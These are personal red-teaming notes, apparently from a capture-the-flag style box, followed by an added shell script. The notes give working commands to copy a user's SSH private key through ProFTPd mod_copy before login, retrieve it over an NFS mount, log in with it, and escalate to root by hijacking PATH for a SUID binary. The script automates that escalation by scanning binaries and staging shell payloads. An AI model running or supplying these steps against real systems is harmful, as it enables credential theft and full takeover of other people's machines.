
Temp Notes for Red Teaming

Created: 28.07.2022




# SMB: browse a share interactively, or recursively pull everything from it
smbclient //
smbget -R smb://

# raw FTP session / banner grab on 21/tcp (the server version tells you what to search for)
nc ftp.server.com 21

# ProFTPd with mod_copy: SITE CPFR/CPTO copy a file server-side, with the daemon's
# own privileges; in affected versions the commands are accepted before login.
# Copy the key somewhere you can read it by another route (here /var/tmp, which
# is reachable through the NFS export of /var below).
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

searchsploit <app_name> <app version>

# NFS: mount the export and pick up the copied key from /var/tmp
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

# ssh refuses a key that is group/world readable; make it 0600 first
ssh -i id_rsa kenobi@

# Find SUID files (owner's setuid bit set); use -perm -g=s for SGID
find / -perm -u=s -type f 2>/dev/null

Say a utility has the SUID bit set: it runs with the effective UID of its owner (root, if root owns it), not of the user who launched it. Check the binary with strings for the commands it calls. If it calls a system utility by bare name rather than by full path (curl instead of /usr/bin/curl), the lookup goes through PATH, so a script with that name in a directory you control, placed first in PATH, runs instead, with the elevated privileges. Two caveats: the program has to inherit your PATH (one that sets its own PATH, or calls the utility by absolute path, is not affected), and the payload should spawn a shell that keeps the effective UID. dash (/bin/sh on Debian and Ubuntu) does; bash drops it when the effective and real UIDs differ unless it is started with -p.

# check which system utility the binary calls without a full path
strings /usr/bin/menu

# create a script with the same name as that utility in a directory you control
echo /bin/sh > /tmp/curl

# make it executable (777 works, but 755 is enough and stops other users replacing it)
chmod 777 /tmp/curl

# put that directory first in PATH so the lookup for curl finds the script
export PATH=/tmp:$PATH

# run the program; when it calls curl, the script runs as the SUID owner instead
/usr/bin/menu
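As an added worked example (not from the original notes), a small POSIX sh helper that automates the two steps above: triage a binary for commands it invokes by bare name that resolve on PATH, then stage the hijack script for each hit. It assumes the binary is readable, that the target really does a PATH lookup (for example through system()), and that the staging directory is writable. strings(1) is replaced by a tr/grep stand-in so the helper runs anywhere; the binary name and the staging directory are placeholders, not taken from the page.

```shell
#!/bin/sh
# Added example: triage a SUID binary for PATH-dependent command calls and
# stage a hijack payload. Not part of the original notes.
export LC_ALL=C   # byte-oriented tr/grep regardless of the caller's locale

# Minimal stand-in for strings(1): split the file on non-printable bytes and
# keep runs of 3+ printable characters (strings(1) itself defaults to 4).
printable_runs() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '^.{3,}$'
}

# Print every token in the binary that looks like a command name with no
# directory component AND resolves to an external program on the current
# PATH. Absolute paths such as /bin/chown and shell builtins are skipped:
# neither is affected by a PATH hijack.
bare_path_lookups() {
    printable_runs "$1" | grep -E '^[A-Za-z][A-Za-z0-9_.+-]*$' | sort -u |
    while IFS= read -r word; do
        case $(command -v "$word" 2>/dev/null) in
            /*) printf '%s\n' "$word" ;;
        esac
    done
}

# Write the payload script <dir>/<name> and print its path. /bin/sh is used
# rather than bash so the effective UID is kept (bash drops it without -p).
# Mode 755, not 777: the file must not be writable by other local users.
stage_hijack() {   # stage_hijack <dir> <name>
    dir=$1; name=$2
    mkdir -p "$dir"
    printf '#!/bin/sh\nexec /bin/sh\n' > "$dir/$name"
    chmod 755 "$dir/$name"
    printf '%s\n' "$dir/$name"
}

# Stage a payload for every bare-name hit in <binary> and print the line to
# run next: prepend the staging directory to PATH, then launch the binary.
hijack_plan() {   # hijack_plan <binary> [stage_dir]   (stage_dir defaults to /tmp)
    bin=$1; dir=${2:-/tmp}
    bare_path_lookups "$bin" | while IFS= read -r hit; do
        stage_hijack "$dir" "$hit" >/dev/null
        printf 'staged %s/%s -> export PATH=%s:$PATH; %s\n' "$dir" "$hit" "$dir" "$bin"
    done
}
```

Usage: `. ./hijack.sh; hijack_plan /usr/bin/menu /tmp` prints one line per hijackable call; run the printed export and launch the binary from the same shell. An empty result means every call uses an absolute path (or the name is not on your PATH), and this technique does not apply to that binary.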
